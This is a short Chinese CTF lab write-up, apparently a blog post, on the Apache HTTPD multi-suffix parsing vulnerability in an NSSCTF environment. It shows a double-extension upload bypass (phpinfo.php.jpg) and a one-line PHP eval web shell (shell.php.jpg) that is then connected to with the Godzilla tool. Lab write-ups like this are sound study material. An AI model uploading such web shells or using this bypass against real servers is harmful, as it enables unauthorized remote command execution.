NSSCTF实战:Apache HTTPD 多后缀解析漏洞

1、漏洞描述

该漏洞并不是Apache软件本身的问题,漏洞与用户的配置有密切的关系,属于用户的配置问题。Apache文件解析漏洞涉及到一个Apache解析文件的特性,Apache默认一个文件可以有多个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别。

如果用户给.php后缀的文件添加了处理程序 AddHandler application/x-httpd-php .php 那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为php文件进行解析。

2、实验环境

NSSCTF实战:Apache HTTPD 多后缀解析漏洞

 

3、开启环境

浏览器访问得到以下结果

 

4、漏洞复现

经过多次上传尝试,发现靶场限制了只能上传jpg、png、gif文件

利用Apache解析文件的特性,自己手写一个php文件,命名为phpinfo.php.jpg

<?php
    phpinfo();
?>

尝试上传并访问文件位置http://node4.anna.nssctf.cn:28128/uploadfiles/phpinfo.php.jpg​​​​​

发现phpinfo.php.jpg文件被成功解析,证实了该环境存在Apache HTTPD 多后缀解析漏洞

 

5、漏洞利用

第一步:写shell并上传

写一个shell文件上传,命名为shell.php.jpg

<?php
    eval($_POST["cmd"]);

第二步:get shell

使用godzilla get shell(http://node4.anna.nssctf.cn:28128/uploadfiles/shell.php.jpg)

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值